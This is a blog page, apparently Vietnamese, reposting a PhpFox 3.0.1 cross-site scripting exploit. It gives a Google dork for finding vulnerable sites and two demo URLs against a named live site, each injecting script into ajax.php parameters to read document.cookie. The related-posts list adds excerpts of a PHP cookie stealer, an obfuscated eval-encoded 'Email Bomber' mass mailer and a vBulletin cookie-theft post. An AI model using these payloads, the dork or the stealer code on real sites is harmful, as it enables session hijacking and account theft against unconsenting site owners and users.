J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Exploit
PHP

PhpFox 3.0.1 Cross Site Scripting (XSS)

PhpFox 3.0.1 Cross Site Scripting. Lỗ hổng bảo mật XSS được phát hiện trong phiên bản 3.0.1 của PhpFox
0 min read
PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog
Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title &...

Demo


http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • Bảo vệ mã nguồn PHP với Leo Obfuscator
    Leo Obfuscator Xin chào, mình là Juno_okyo. Hôm nay mình sẽ giới thiệu với các bạn một công cụ miễn phí giúp mã hóa, tối ưu hóa và bảo vệ mã nguồn PHP. Đó chính là Leo Obf…
  • vBulletin Announcements Cookie Steal Vulnerability
    vBulletin Announcements, by default has html enabled, so if you get access to a forum using other exploits and get a user with acp info, but it only has default admin cp permissio…
  • Email Bomber aka Mass Mailer
    http://pastebin.com/qegBLu97 <?php eval(gzinflate(base64_decode(strrev(str_rot13('==jSkm93x3+exhvVPiR/chhnrCbvIkgBmg088wmXyuwj9gIGXqsKPlEulq5Wiz1ANxIJWnlowW3Nv6LsIzSMTtIe3…
  • Con đường trở thành lập trình viên PHP
    Lương lập trình viên PHP lúc mới ra trường chỉ khoảng 3 đến 5 triệu đồng một tháng, nhưng đây là thời gian để bạn tập trung vào nâng cao kỹ năng lập trình, kỹ năng mềm, làm việc …
  • How to create cookie stealer Coding in PHP? (get via email)
    Here is the simple Cookie Stealer code: Cookie stored in File: <?php $cookie = $HTTP_GET_VARS["cookie"]; $steal = fopen("cookiefile.txt", "a"); fwrite($steal, $cookie ."…
  • Share code Backup dữ liệu MySQL trên PHP
    Chào mọi người, để sao lưu database MySQL chúng ta có rất nhiều cách: Bạn có thể dùng PHPMyAdmin, một mã nguồn mở để sao lưu phục hồi, hoặc bạn có thể sử dụng tool của MySQL... T…